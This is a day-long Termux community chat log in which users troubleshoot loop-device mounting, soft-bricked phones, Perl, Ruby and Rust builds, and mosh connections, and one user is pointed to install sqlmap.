2017-08-01 00:18:38 gitter (Auxilus) But with root is it possible?
2017-08-01 00:18:47 gitter (vishalbiswas) no idea
2017-08-01 00:19:07 sdrausty There is some wifi stuff in https://github.com/sdrausty/buildAPKs ack wifi
will show you where the wifi APKs are.
2017-08-01 00:19:25 gitter (Auxilus) I use an app androdumpper
which looks like it has that kinda access
2017-08-01 00:19:27 gitter (vishalbiswas) tried it before but it used to hang the wifi and had to restart
2017-08-01 00:19:40 sdrausty com.example.android.wifidirect.discovery
2017-08-01 00:19:40 gitter (vishalbiswas) i’m not talking about any of these programs
2017-08-01 00:21:47 sdrausty com.marakana.android.wifiinfo
2017-08-01 00:22:06 gitter (vishalbiswas) ```bash
2017-08-01 00:22:06 gitter (vishalbiswas) git clone –depth 1 https://github.com/mongodb/mongo
2017-08-01 00:22:06 gitter (vishalbiswas) cd mongo/src/third_party/mozjs-45
2017-08-01 00:22:06 gitter (vishalbiswas) [full message: https://gitter.im/termux/termux?at=598001eef5b3458e309cda5e]
2017-08-01 00:22:09 gitter (Auxilus) Is termux repo down?
2017-08-01 00:22:15 gitter (vishalbiswas) run this please
2017-08-01 00:22:18 gitter (Auxilus) I cant apt update
2017-08-01 00:22:19 sdrausty android.net.wifi.WifiManager
2017-08-01 00:22:31 gitter (Auxilus) @vishalbiswas me?
2017-08-01 00:22:38 gitter (vishalbiswas) yes
2017-08-01 00:22:44 gitter (Auxilus) K wait
2017-08-01 00:22:47 sdrausty $ au
2017-08-01 00:22:47 sdrausty Hit:1 http://termux.net stable InRelease
2017-08-01 00:22:47 sdrausty Reading package lists… Done
2017-08-01 00:22:47 sdrausty Building dependency tree
2017-08-01 00:22:47 sdrausty Reading state information… Done
2017-08-01 00:22:47 sdrausty All packages are up to date.
2017-08-01 00:22:47 sdrausty Reading package lists… Done
2017-08-01 00:22:47 sdrausty Building dependency tree
2017-08-01 00:22:47 sdrausty Reading state information… Done
2017-08-01 00:22:47 sdrausty Calculating upgrade… Done
2017-08-01 00:22:47 sdrausty 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
2017-08-01 00:23:18 sdrausty $ cat au
2017-08-01 00:23:36 sdrausty apt update && apt upgrade
2017-08-01 00:24:32 sdrausty @vishslbiswas where exactly does it fail?
2017-08-01 00:24:42 gitter (vishalbiswas) ?
2017-08-01 00:24:44 gitter (vishalbiswas) what?
2017-08-01 00:24:58 sdrausty How to grant loop perms to termux-app
2017-08-01 00:25:27 sdrausty (vishalbiswas) that’s where sdrausty’s idea of #1176 fails
2017-08-01 00:26:28 sdrausty ?? where does 1176 fail
2017-08-01 00:26:39 gitter (vishalbiswas) there are no intents or android permissions for GRANT_LOOP_DEVICE or similar, android expects that you won’t use it so only way is to use root.
2017-08-01 00:27:18 gitter (vishalbiswas) unless there’s magically a another way
2017-08-01 00:27:21 sdrausty Do you know of any root I can build on device?
2017-08-01 00:27:24 sdrausty then
2017-08-01 00:27:33 gitter (vishalbiswas) ?
2017-08-01 00:27:42 gitter (vishalbiswas) “any root”?
2017-08-01 00:27:44 sdrausty build root on device
2017-08-01 00:28:03 gitter (vishalbiswas) i mean root as in root access
2017-08-01 00:28:04 sdrausty i want to know the source
2017-08-01 00:28:28 sdrausty not some magical APK I know nothing about
2017-08-01 00:28:50 sdrausty su
2017-08-01 00:28:55 sdrausty sudo
2017-08-01 00:29:40 gitter (vishalbiswas) I’m a noob in that respect. I don’t actually know how these supersu apps get root access
2017-08-01 00:30:06 sdrausty Termux, I can study its’ source.
2017-08-01 00:30:31 gitter (vishalbiswas) those commands that I gave require a huge amount of space. my emulator is out of memory all ready
2017-08-01 00:30:38 sdrausty I tried one off Google Play a while ago.
2017-08-01 00:31:56 sdrausty Turned my phone into a live brivk in the end. Story at https://plus.google.com/104092656004159577193/posts/4QGxJc3Ft3N
2017-08-01 00:32:20 sdrausty brivk *brick
2017-08-01 00:33:01 sdrausty Basically, I was attempting to unroot my device by factory resetting it at boot. That is when it morphed into a live brick! This marvelous machine had gotten stuck in a loop in setup. The screen was on when requested, asking the same setup questions over and over again. No flashlights https://github.com/sdrausty/buildAPKs/blob/master/scripts/build/buildFlashlights.sh No compasses
2017-08-01 00:33:01 sdrausty https://github.com/sdrausty/buildAPKsClassifiedApps/tree/master/compasses No games https://github.com/sdrausty/buildAPKsClassifiedApps/tree/master/games nor anything else; No phone; No text; No SMS; Nothing; Nothing, but a live brick!
2017-08-01 00:33:40 gitter (vishalbiswas) bro if your device shows the logo then its not bricked
2017-08-01 00:34:00 gitter (vishalbiswas) just flash your stock rom
2017-08-01 00:34:11 gitter (Auxilus) Whats bricked?
2017-08-01 00:34:18 gitter (vishalbiswas) the state in which your device is, is called soft brick
2017-08-01 00:34:18 gitter (Auxilus) Is it like rooting?
2017-08-01 00:34:22 gitter (vishalbiswas) you can recover
2017-08-01 00:34:43 sdrausty LS stylo
2017-08-01 00:34:58 sdrausty LS *LG
2017-08-01 00:35:13 gitter (vishalbiswas) I had multiple phones soft bricked and recovered them. Its easy
2017-08-01 00:35:22 gitter (Auxilus) Yo
2017-08-01 00:35:30 gitter (Auxilus) Whats bricking?
2017-08-01 00:35:44 sdrausty There is hope then for that phone then. Thank you.
2017-08-01 00:35:50 gitter (vishalbiswas) bricking is corrupting your firmware so that your device won’t boot successfully anymore
2017-08-01 00:36:08 sdrausty no boot = brick
2017-08-01 00:36:18 gitter (Auxilus) @vishalbiswas its downloading firefox
2017-08-01 00:36:33 gitter (vishalbiswas) soft brick is software brick which you can recover from by just instally stock firmware
2017-08-01 00:36:55 gitter (vishalbiswas) hard brick is hardware brick which can only be recovered by your phone’s company
2017-08-01 00:38:20 sdrausty Gonna have to boot a real box with whirling fans and disks and what not. aargh
2017-08-01 00:39:44 sdrausty Trying to fix that phone might have some good spinnoffs…
2017-08-01 00:44:28 sdrausty @Auxilus I think it is called “bricking while rooting”..
2017-08-01 00:45:00 sdrausty My got “soft bricked” while unrooting.
2017-08-01 00:45:11 sdrausty My *Mine
2017-08-01 00:45:32 u0_a2124 is there a pkg to change the display? ie invert colors?
2017-08-01 00:45:33 gitter (vishalbiswas) sdrausty: make sure you match the phone model exactly
2017-08-01 00:45:35 gitter (vishalbiswas) https://forum.xda-developers.com/lg-g-stylo/development/rom-lg-g-stylo-h631-ms631-v10j-stock-t3211563
2017-08-01 00:45:40 gitter (vishalbiswas) is this the one?
2017-08-01 00:46:30 gitter (vishalbiswas) do you still have a custom recovery?
2017-08-01 00:46:40 gitter (vishalbiswas) if yes then you can use this method
2017-08-01 00:47:34 u0_a2124 q
2017-08-01 00:49:14 gitter (vishalbiswas) if you don’t then use this method http://www.modifyandroid.com/stock-roms/lg/how-to-flash-stock-rom-for-lg-g-stylo/
2017-08-01 00:49:45 rods-tab3 u0 get termux-styling
2017-08-01 00:57:03 sdrausty @vishalbiswas Thank you for the links.
2017-08-01 00:58:01 gitter (vishalbiswas) just make sure they are the correct model since there has been multiple lg stylos
2017-08-01 00:58:17 sdrausty ok
2017-08-01 01:15:59 gitter (themastersunil) $ perl facebook.pl
2017-08-01 01:15:59 gitter (themastersunil) Can’t locate Net/SSLeay/Handle.pm in @INC (you may need to install the Net::SSLeay::Handle module) (@INC contains: /data/data/com.termux/files/usr/lib/perl5/site_perl/5.26.0/aarch64-android /data/data/com.termux/files/usr/lib/perl5/site_perl/5.26.0 /data/data/com.termux/files/usr/lib/perl5/5.26.0/aarch64-android /data/data/com.termux/files/usr/lib/perl5/5.26.0 .) at facebook.pl line 7.
2017-08-01 01:15:59 gitter (themastersunil) BEGIN failed–compilation aborted at facebook.pl line 7.
2017-08-01 01:16:20 gitter (themastersunil) please help, how to install Net/SSLeay in Termux???
2017-08-01 01:19:06 sdrausty cpan install Net::SSLeay::Handle
2017-08-01 01:27:10 gitter (themastersunil) Warning: You do not have write permission for Perl library directories.
2017-08-01 01:27:10 gitter (themastersunil)
2017-08-01 01:27:10 gitter (themastersunil) To install modules, you need to configure a local Perl library directory or
2017-08-01 01:27:10 gitter (themastersunil) [full message: https://gitter.im/termux/termux?at=5980112e329651f46edd25cd]
2017-08-01 01:27:41 gitter (themastersunil) what I’ll choose??? sudo
2017-08-01 01:27:54 gitter (vishalbiswas) @Auxilus shit, generating that configure requires more than 2.4 GB free space
2017-08-01 01:30:09 live_the_dream themastersunil cpan
2017-08-01 01:38:50 sdrausty $ /system/bin/toybox mount -o loop -t minux my_big_file mountDir
2017-08-01 01:38:50 sdrausty mount: bad /etc/fstab: No such file or directory
2017-08-01 01:39:26 sdrausty Will this work if there is chroot?
2017-08-01 01:40:20 gitter (vishalbiswas) no idea
2017-08-01 02:10:24 live_the_dream i don’t think non root can moun6
2017-08-01 04:52:17 frumpylava live_the_dream: hmm… I removed the line from the patch, but it doesn’t really seem to change anything when it comes to resizing ncmpcpp, which is what I was actually trying to fix.
2017-08-01 05:26:12 u0_a197 k
2017-08-01 05:28:57 live_the_dream it did for me…
2017-08-01 05:32:08 frumpylava live_the_dream: Maybe I did it wrong?
2017-08-01 06:59:41 gitter (Ashish882) Hi
2017-08-01 06:59:48 gitter (Ashish882) Anyone
2017-08-01 07:39:10 live_the_dream ?
2017-08-01 07:57:10 benl90 Hello, I want to ask about java. Is java compiler available for termux? Thanks
2017-08-01 08:20:19 gitter (Auxilus) How do I clear my command history?
2017-08-01 08:21:31 gitter (Auxilus) @vishalbiswas the file is big, ill get to it once I get wifi
2017-08-01 09:50:22 mr1404_ is anyone there ?
2017-08-01 09:51:14 mr1404_ I am Vietnamese, I need some support about termux !!!
2017-08-01 09:51:48 mr1404_ Please hear from anyone please call 01265023870
2017-08-01 11:19:34 gitter (vishalbiswas) @Auxilus history -c
2017-08-01 11:20:16 gitter (vishalbiswas) bel90: jdk-9 is available but very unstatble
2017-08-01 11:38:11 mr1404 Is anyone there ?
2017-08-01 11:38:26 gitter (vishalbiswas) yes
2017-08-01 11:38:42 mr1404 I am from vietnamese
2017-08-01 11:38:59 mr1404 Cho tôi hỏi làm sao để cài được các tool linux trên termuz
2017-08-01 11:39:24 mr1404 Let me ask how to install the linux tool on the termux
2017-08-01 11:39:50 mr1404 Pkg install sqlmap ???
2017-08-01 11:40:01 gitter (vishalbiswas) pip install sqlmap
2017-08-01 11:40:16 gitter (vishalbiswas) first you should have python installed pkg install python
2017-08-01 11:40:43 gitter (vishalbiswas) sorry python2 is required
2017-08-01 11:40:59 gitter (vishalbiswas) pkg install python2; pip2 install sqlmap
2017-08-01 11:42:20 mr1404 Can you download all the tools on linux?
2017-08-01 11:42:44 mr1404 You need to add a tutorial somewhere on the application
2017-08-01 11:43:10 gitter (vishalbiswas) not all
2017-08-01 11:43:26 gitter (vishalbiswas) people need to port them for android first
2017-08-01 11:43:59 mr1404 Can you install working environment and connect via vnc?
2017-08-01 11:44:26 gitter (vishalbiswas) no gui, yet
2017-08-01 11:45:21 mr1404 I hope the next update will add many window functions to v
2017-08-01 11:45:39 gitter (vishalbiswas) ?
2017-08-01 11:45:47 mr1404 You should add show directory too not knowing where I should ph
2017-08-01 11:46:31 gitter (vishalbiswas) ph?
2017-08-01 11:46:46 mr1404 You need more features to open multiple work windows and display the location there
2017-08-01 11:47:01 mr1404 Sorry english level is not high :(
2017-08-01 11:47:08 gitter (vishalbiswas) you can slide from left
2017-08-01 11:47:19 gitter (vishalbiswas) there you can start new sessions
2017-08-01 11:48:18 mr1404 I can not
2017-08-01 11:48:45 mr1404 https://usercontent.irccloud-cdn.com/file/VDm0eMoZ/Screenshot_20170801-224830.png
2017-08-01 11:48:58 gitter (vishalbiswas) slide from left to right
2017-08-01 11:49:00 mr1404 It is too empty
2017-08-01 11:49:06 gitter (vishalbiswas) from edge of screen
2017-08-01 11:49:13 gitter (vishalbiswas) from left edge
2017-08-01 11:50:27 mr1404 Oh my god
2017-08-01 11:50:43 mr1404 I do not know thank you very much> <
2017-08-01 11:51:07 gitter (vishalbiswas) that was my reaction, too, when I found out
2017-08-01 11:52:13 mr1404 So funny> <
2017-08-01 11:52:36 mr1404 Where are you from ?
2017-08-01 11:52:57 gitter (vishalbiswas) India
2017-08-01 11:54:21 mr1404 Vietnam
2017-08-01 11:54:31 mr1404 nice to know you
2017-08-01 11:55:14 gitter (vishalbiswas) you, too. so what do you use termux for?
2017-08-01 11:56:24 mr1404 Learn maybe i like linux for windows
2017-08-01 11:56:38 mr1404 Mainly about network security
2017-08-01 11:56:58 mr1404 You know in Vietnam very few people use linux
2017-08-01 11:57:08 mr1404 Wanting to learn is also difficult
2017-08-01 11:57:35 gitter (vishalbiswas) people use windows because they are familiar with it
2017-08-01 11:57:40 mr1404 I am 16 years old and very passionate about information technology
2017-08-01 11:58:11 mr1404 Very fond of ubuntu
2017-08-01 11:58:43 gitter (vishalbiswas) ubuntu is what I started out with
2017-08-01 11:58:49 mr1404 It is my whole life every day to spend a lot of time learning how to use it
2017-08-01 11:59:23 mr1404 Ubuntu has a strong developer community
2017-08-01 11:59:32 mr1404 Pretty peace of mind about it
2017-08-01 11:59:53 gitter (vishalbiswas) you tried arch linux yet?
2017-08-01 12:00:17 mr1404 How is it?
2017-08-01 12:00:42 gitter (vishalbiswas) it has the best and largest user community and documentation
2017-08-01 12:00:54 gitter (vishalbiswas) also I get all the updates within a day or two
2017-08-01 12:01:14 mr1404 Are there powerful testing tools?
2017-08-01 12:01:33 gitter (vishalbiswas) in termux?
2017-08-01 12:02:11 mr1404 Arch linux
2017-08-01 12:02:32 gitter (vishalbiswas) there’s a thing called Archlinux User Repository (AUR)
2017-08-01 12:02:39 mr1404 I can install any tools on the termux
2017-08-01 12:02:57 gitter (vishalbiswas) where people can submit scripts to build any program they want
2017-08-01 12:03:27 mr1404 Perfect open source
2017-08-01 12:03:46 mr1404 Like github right?
2017-08-01 12:04:05 gitter (vishalbiswas) but they only submit scripts and patches to build packages
2017-08-01 12:04:20 gitter (vishalbiswas) so if you can find a publicly available program
2017-08-01 12:04:41 gitter (vishalbiswas) chances are i can install it in arch linux with just a single command
2017-08-01 12:05:27 mr1404 pretty good
2017-08-01 12:05:37 mr1404 There are grooves I will learn
2017-08-01 12:05:58 gitter (vishalbiswas) in termux, you can install metasploit
2017-08-01 12:06:07 gitter (vishalbiswas) hydra
2017-08-01 12:06:14 gitter (vishalbiswas) that’s about it, though
2017-08-01 12:06:58 sdrausty ubuntu rocks, debian rocks much more https://www.debian.org
2017-08-01 12:07:25 mr1404 Is that
2017-08-01 12:07:29 gitter (vishalbiswas) I’m an Archer, always
2017-08-01 12:08:14 sdrausty Is it possible to grant permission for Termux to use loop devices? #375
2017-08-01 12:08:28 sdrausty https://github.com/termux/termux-app/issues/375
2017-08-01 12:08:39 mr1404 Who knows how to penetrate a website?
2017-08-01 13:10:27 gitter (Grimler91) @vishalbiswas I’m playing around with your cool x11 branch. I tried building tigervnc and after some minor fixes I got stuck at building libXdamage with the error
2017-08-01 13:10:27 gitter (Grimler91) `Package xorg-macros was not found in the pkg-config search path.
2017-08-01 13:10:28 gitter (Grimler91) Perhaps you should add the directory containing `xorg-macros.pc’
2017-08-01 13:10:28 gitter (Grimler91) [full message: https://gitter.im/termux/termux?at=5980b604c101bc4e3adca6fc]
2017-08-01 13:23:10 gitter (Grimler91) Sorry about the formatting
2017-08-01 13:43:43 gitter (vishalbiswas) Build libxfixes
2017-08-01 13:44:03 gitter (vishalbiswas) I haven’t sorted out the dependencies
2017-08-01 14:06:10 sdrausty vishalbiswas: https://github.com/termux/termux-app/issues/375 Has links to llopback access. Can we use this?
2017-08-01 14:06:25 sdrausty http://apidocs.strongloop.com/loopback-sdk-android/api/index.html
2017-08-01 14:07:17 sdrausty llopback *loopback
2017-08-01 14:12:28 sdrausty https://www.google.com/search?q=intent+permission+android+”loopback”
2017-08-01 14:14:04 gitter (Grimler91) @vishalbiswas ah, thanks!
2017-08-01 14:14:46 sdrausty vishalbiswas: Is this what we want? com.strongloop.android.loopback.example
2017-08-01 14:21:49 sdrausty to enable unlimited native space on device (via 0TG)
2017-08-01 14:25:38 sdrausty & external micro SD
2017-08-01 14:26:08 sdrausty via loopback mounts.
2017-08-01 15:31:39 sdrausty native space *native Android space
2017-08-01 15:33:30 BrainDamage “LoopBack is a highly-extensible, open-source Node.js framework”
2017-08-01 15:33:30 BrainDamage wat
2017-08-01 15:33:36 BrainDamage that’s not the kernel loopback driver
2017-08-01 15:40:41 sdrausty BrainBamagev Are there any to build apps with?
2017-08-01 15:49:13 sdrausty loopback intents or permissions
2017-08-01 15:50:05 sdrausty https://www.google.com/search?q=intent+permission+android+loopback
2017-08-01 15:50:57 sdrausty qhttps://github.com/termux/termux-app/issues/375
2017-08-01 15:52:21 BrainDamage just because 2 things are called loopback it doesn’t meanthey are the same thing
2017-08-01 15:52:29 sdrausty figures
2017-08-01 15:52:47 BrainDamage you can’t use mount in android as user
2017-08-01 15:53:48 sdrausty We want the /dev/loop* from standard Linux.
2017-08-01 15:54:25 BrainDamage i want fuse support, which would allow this and many more, but, android permission model forbids it
2017-08-01 15:54:37 sdrausty Taht is what these issues are about #1176 termux-p
2017-08-01 15:54:55 sdrausty ackages & #375 termux-app
2017-08-01 15:55:53 sdrausty android permission model Where is the synopsis?
2017-08-01 15:56:52 sdrausty Maybe we can make mount loop work in user dpace with psuedo devices?
2017-08-01 16:00:50 sdrausty I am pretty sure this mount loopback model works on rooted phones. Can anyone with a rooted phone give this a try?
2017-08-01 16:01:40 sdrausty (create file > format filesystem in file > mount filesystem in file via loop device)
2017-08-01 16:01:47 BrainDamage it does work with root
2017-08-01 16:01:54 sdrausty cool
2017-08-01 16:02:09 BrainDamage I’ve used it to have a linux chroot for a while
2017-08-01 16:03:42 sdrausty Braindammage: Can you check if
2017-08-01 16:03:45 sdrausty /system/bin/toybox mount -o loop -t ext4 file mountDir
2017-08-01 16:04:07 sdrausty works as nonroot?
2017-08-01 16:04:41 Evolution has anyone had issues with rubygems building? was looking at some things like getting jekyll to run
2017-08-01 16:04:41 Evolution but the gems required won’t build properly
2017-08-01 16:04:50 sdrausty I get “mount: bad /etc/fstab: No such file or directory”
2017-08-01 16:05:35 sdrausty But this is not in chroot. Can you try if toybox will mount in chroot?
2017-08-01 16:05:58 BrainDamage it won’t mount
2017-08-01 16:06:05 BrainDamage mount is a wrapper for kernel functions
2017-08-01 16:06:20 sdrausty /system/bin/make_ext4fs -l 10M file
2017-08-01 16:06:23 BrainDamage mount is a kernel operation,and the kernel will deny you
2017-08-01 16:06:59 sdrausty What is the error once it finds fstab?
2017-08-01 16:10:22 sdrausty Evolutoin: https://github.com/termux/termux-packages/issues/969
2017-08-01 16:10:34 BrainDamage just try it in linux and you’ll know “mount: only root can do that”
2017-08-01 16:22:27 gitter (AshleyNykiel) Is there a way to find out the Termux version number from the command line, would also like to be able to query the version numbers for the API and Styling addons as well, if there is no way to do so currently perhaps this could be added to the API utilities
2017-08-01 16:31:54 rods-tab3 termux-info gives version
2017-08-01 16:54:16 frumpylava rods-tab3: termux-info is broken. There isn’t a way to do it.
2017-08-01 16:56:05 rods-tab3 i didn’t say it gave the correct version number; just a number – f-droid gives the correct number
2017-08-01 16:56:05 sdrausty BrainDamage: https://unix.stackexchange.com/questions/96625/allow-non-superusers-to-mount-any-filesystem
2017-08-01 16:58:10 BrainDamage sdrausty: that implies you already have root, to configure your machineto let non root to
2017-08-01 17:02:02 sdrausty @AshleyNykiel aapt dump badging /data/app/com.termux-2/base.apk|grep versionName
2017-08-01 17:02:59 sdrausty Will give you the correct version number, but it is a cludge. https://github.com/termux/termux-packages/issues/1045
2017-08-01 17:04:31 BrainDamage sdrausty: simply put, if you could do what you want, then you should immediately report to google and tell it to get fixed
2017-08-01 17:04:39 BrainDamage because it’d be a huge security risk
2017-08-01 17:09:27 sdrausty to mount filesystems in an apps userspace, how is this a security risk? BrainDamage:
2017-08-01 17:10:57 sdrausty Linux Deploy mounts a filesystem in its’ userspace, so do other Linux Google Playstore apps.
2017-08-01 17:11:01 BrainDamage not app userspace, but fs in general
2017-08-01 17:11:04 BrainDamage the fs is the same fo every app
2017-08-01 17:11:20 BrainDamage linux deploy uses root
2017-08-01 17:11:31 BrainDamage because the moment you can use mount you can overwrite the filesystem
2017-08-01 17:11:36 BrainDamage including system paths
2017-08-01 17:12:13 sdrausty (create file > format filesystem in file > mount filesystem in file via loop device)
2017-08-01 17:12:14 BrainDamage they could add a crapload of code to ensure you don’t touch vital things and can only mount things to safe paths
2017-08-01 17:12:14 BrainDamage orrr, theycould take th easy way out and block everything
2017-08-01 17:12:29 BrainDamage again, linux deploy uses root
2017-08-01 17:14:12 sdrausty You do not need root or rooting to run Linux Deploy.
2017-08-01 17:14:44 BrainDamage the nonroot optionuses proot, not mount
2017-08-01 17:14:50 sdrausty Just download from Google Play and enjoy, like Termux.
2017-08-01 17:35:04 sdrausty BrainDamage: chroot-container is what Linux Deploy uses
2017-08-01 18:00:00 sdrausty https://www.google.com/search?q=mount+non+root+user+site%3Atldp.org
2017-08-01 19:07:23 live_the_dream fornwall: @fornwall you looked into cmake on arm yet?
2017-08-01 20:13:39 sdrausty $ vi /etc/fstab
2017-08-01 20:13:39 sdrausty $ /system/bin/toybox mount -o loop -t ext4 file mountDir
2017-08-01 20:13:39 sdrausty mount: ‘mountDir’ not in fstab
2017-08-01 20:13:39 sdrausty $ grep mountDir /etc/fstab
2017-08-01 20:13:39 sdrausty /home/file /home/mountDir ext4 loop,nosuid 0 0
2017-08-01 20:14:05 sdrausty using termux-chroot
2017-08-01 20:33:02 gitter (mklein994) @vishalbiswas I can’t remember if you answered already; it’s been a while… I’m still getting that error with cargo search
. Have you made any progress by chance?
2017-08-01 20:33:58 gitter (mklein994) https://gist.github.com/mklein994/b793b94ea879f9f6bbafd18613da522f
2017-08-01 20:49:20 live_the_dream mklein994 i made a workaround
2017-08-01 20:50:09 live_the_dream @mklein994
2017-08-01 20:50:15 gitter (mklein994) What was it?
2017-08-01 20:51:05 live_the_dream in ~/.gitconfig
2017-08-01 20:51:05 live_the_dream put [url “git://github.com/rust-lang/crates.io-index”]
2017-08-01 20:51:05 live_the_dream insteadOf = https://github.com/rust-lang/crates.io-index
2017-08-01 20:51:10 live_the_dream no put obviously
2017-08-01 20:53:00 gitter (mklein994) Right. So basically redirect https://
to use git://
hopefully something down the line will fix this… Thanks!
2017-08-01 20:53:06 live_the_dream its really annoying that when you compile libgit2 in debug mode it works
2017-08-01 20:53:19 live_the_dream yeah
2017-08-01 20:53:21 gitter (mklein994) Wait… what?
2017-08-01 20:53:27 live_the_dream yes
2017-08-01 20:53:28 gitter (mklein994) O.o
2017-08-01 20:54:08 live_the_dream it works if you compiled termux libgit2 in debug mode
2017-08-01 21:01:15 live_the_dream well ndk guys did label libc++ as unstable…
2017-08-01 21:03:09 gitter (mklein994) I’m a bit green at this stuff—what does libgit2 depend on now in its place?
2017-08-01 21:04:27 live_the_dream what stuff depends on libgit2? nothing afaik
2017-08-01 21:05:21 gitter (mklein994) I mean, what does libc++
have to do with it?
2017-08-01 21:08:21 live_the_dream it uses c++ headers … cargo was working find before the switch to libc++
2017-08-01 21:08:21 live_the_dream fine
2017-08-01 21:09:09 gitter (mklein994) Growing pains. Hmph
2017-08-01 21:46:50 sdrausty If Releases · meefik/linuxdeploy · GitHub can mount a filesystem from a file, Termux can too https://github.com/meefik/linuxdeploy
2017-08-01 21:48:30 sdrausty Does Anyone Want to Have More Native Space on Device?
2017-08-01 21:48:48 sdrausty https://github.com/termux/termux-packages/issues/1176
2017-08-01 21:50:06 sdrausty chroot-container?
2017-08-01 21:53:51 sdrausty Debian noroot uses proot from https://github.com/pelya/debian-noroot
2017-08-01 21:54:06 sdrausty & Google Play
2017-08-01 21:54:18 sdrausty proot?
2017-08-01 22:07:07 sdrausty to mount a filesystem after downloading it fron sonewhere in the Internet.
2017-08-01 22:09:42 sdrausty I have got three (3) mounts in my Android. How about you?
2017-08-01 22:09:48 sdrausty /storage/3861-6531/Android/data/com.termux/files/usr/share/bash-completion/completions/mount
2017-08-01 22:09:48 sdrausty /system/bin/mount
2017-08-01 22:09:48 sdrausty /sys/fs/selinux/class/filesystem/perms/mount
2017-08-01 22:10:22 sdrausty and there are two more
2017-08-01 22:10:41 sdrausty one in toolbox, and one more in toybox
2017-08-01 22:11:04 sdrausty /system/bin/toybox
2017-08-01 22:12:08 sdrausty $ /system/bin/toolbox mount
2017-08-01 22:13:11 sdrausty $ /system/bin/toybox mount
2017-08-01 22:13:55 sdrausty That is a total of five mount commands, and there may be more.
2017-08-01 22:13:59 sdrausty 5
2017-08-01 22:31:08 live_the_dream is linuxdeploy using root to do that?
2017-08-01 22:32:45 live_the_dream anyway i might work up a script to use external card for all things not executable
2017-08-01 22:32:50 live_the_dream so it will be symlinks a gogo
2017-08-01 22:38:33 sdrausty Linux Deploy uses chroot-container live_the_dream:
2017-08-01 22:40:07 sdrausty Even though this is a fairly simple issue in Linux (create file > format filesystem in file > mount filesystem in file via loop device), it is impossible in Termux at present.
2017-08-01 22:40:32 sdrausty https://github.com/termux/termux-packages/issues/1176
2017-08-01 22:41:25 sdrausty Who here knows APK java programming @#termux?
2017-08-01 22:42:11 sdrausty If Releases · meefik/linuxdeploy · GitHub can mount a filesystem from a file, Termux can too https://github.com/meefik/linuxdeploy
2017-08-01 22:43:20 sdrausty @vishalbiswas Which lines of the linuxdeploy code do we want?
2017-08-01 22:43:32 sdrausty @form
2017-08-01 22:43:53 sdrausty wher rum
2017-08-01 22:43:56 sdrausty ?
2017-08-01 22:46:59 live_the_dream i think he can only mount file with root
2017-08-01 22:48:30 gitter (vishalbiswas) sdrausty: chroot uses root
2017-08-01 22:48:47 gitter (vishalbiswas) proot was developed because of it
2017-08-01 22:49:23 gitter (vishalbiswas) And chroot doesn’t mount anything
2017-08-01 22:49:40 gitter (vishalbiswas) It just changes the / path
2017-08-01 22:51:02 zack_ hey, is anyone able to connect to a termux chroot via mosh? I’m trying on a chromebook but it rejects my public key
2017-08-01 22:51:15 zack_ it shouldn’t, I can see it in the authorized_keys fil
2017-08-01 22:51:16 zack_ e
2017-08-01 22:52:05 zack_ alternatively, does anyone else see the secure shell chrome app freeze after a restart when connected to a termux chroot via ssh?
2017-08-01 23:00:12 live_the_dream not many people here use chrome os unfortunately
2017-08-01 23:00:44 zack_ fair enough
2017-08-01 23:03:31 cottongin i do
2017-08-01 23:03:33 live_the_dream i expect a few more to turn up after kenn white chromos blog
2017-08-01 23:04:03 cottongin i successfully connected to a termux chroot via ssh last night
2017-08-01 23:04:06 cottongin haven’t tried with mosh
2017-08-01 23:04:10 cottongin what error does it give you
2017-08-01 23:17:24 zack_ it asks for a password for my ssh key
2017-08-01 23:17:33 zack_ my key doesn’t have a password, of course
2017-08-01 23:17:41 zack_ I can connect through ssh as well, just not mosh
2017-08-01 23:17:51 cottongin hm
2017-08-01 23:18:03 cottongin you’re using the mosh chrome extension?
2017-08-01 23:18:09 zack_ yes exactly
2017-08-01 23:18:18 cottongin let me see if it works for me hang on
2017-08-01 23:18:25 zack_ thanks
2017-08-01 23:18:40 live_the_dream udp not supported via proot?
2017-08-01 23:19:21 zack_ aha, that could be it
2017-08-01 23:19:32 live_the_dream or the port range mosh uses?
2017-08-01 23:19:41 cottongin oh yeah that’s probably it
2017-08-01 23:19:53 zack_ port is probably fine, same as ssh I think
2017-08-01 23:19:58 cottongin yes and no
2017-08-01 23:20:03 cottongin mosh uses it’s own port range
2017-08-01 23:20:13 cottongin 65000 or something
2017-08-01 23:20:15 cottongin i forget
2017-08-01 23:20:39 zack_ Mosh will use the first available UDP port, starting at 60001 and stopping at 60999. If you are only going to have a small handful of concurrent sessions on a server, then you can forward a smaller range of ports (e.g., 60000 to 60010).
2017-08-01 23:20:41 zack_ from the site
2017-08-01 23:20:44 zack_ I didn’t realise, thanks
2017-08-01 23:20:46 cottongin yeah
2017-08-01 23:42:01 sdrausty https://github.com/termux/termux-app/issues/376
2017-08-01 23:42:21 sdrausty Feature Request: mount loopback device
2017-08-02 00:12:32 sdrausty Maybe there is another way? There are other apps that do not require superuser. What are they?
2017-08-02 00:15:13 sdrausty Where is everyone?
2017-08-02 00:16:38 sdrausty Space (Android space) on device is important. Isn’t it? The more the merrier:) Right?
2017-08-02 00:31:19 rods-tab3 there are android phones with 8 core cpu, 8 GB ram, 256GB internal storage – should solve the issue
2017-08-02 00:37:51 sdrausty rods-tab³: on external SD
2017-08-02 00:38:38 sdrausty create file > format filesystem in file > mount filesystem in file via loop device
2017-08-02 00:39:19 sdrausty 128GB $40USD microSD
2017-08-02 00:39:44 sdrausty http://www.frys.com/search?cat=-69556&nearbyStoreName=false&pType=pDisplay&query_search=Micro%20sd&fq=100520%20128
2017-08-02 00:43:49 sdrausty rids-tab3: What is the price of the phone you mentioned?
2017-08-02 00:44:45 sdrausty https://github.com/guardianproject/lildebi
2017-08-02 00:45:02 sdrausty mounts container with nonroot?
2017-08-02 00:47:50 sdrausty https://github.com/termux/termux-app/issues/376
2017-08-02 00:48:06 sdrausty Feature Request: mount loopback device
#376
2017-08-02 00:49:38 sdrausty 4TB or more on OTG
2017-08-02 01:07:06 sdrausty rods-tab³: “Feature Request: mount loopback device
#376
2017-08-02 01:09:19 live_the_dream can you not spam that please sdrausty?
2017-08-02 01:12:57 sdrausty Gnuroot wheezy? Has anyone tried it?
2017-08-02 01:13:38 sdrausty live_the_dream: I thought I was alone…
2017-08-02 01:13:38 gitter (vishalbiswas) that project hasn’t seen an update in more than a year
2017-08-02 01:19:33 gitter (Hax4us) Yes..I have gnuroot wheezy
2017-08-02 01:19:57 sdrausty Where is the code for root? Anyone? https://github.com/termux/termux-app/issues/376 I’ll work on keeping my messages to one line. Thank you :live_the_dream
2017-08-02 01:20:28 sdrausty Feature Request: mount loopback device
#376
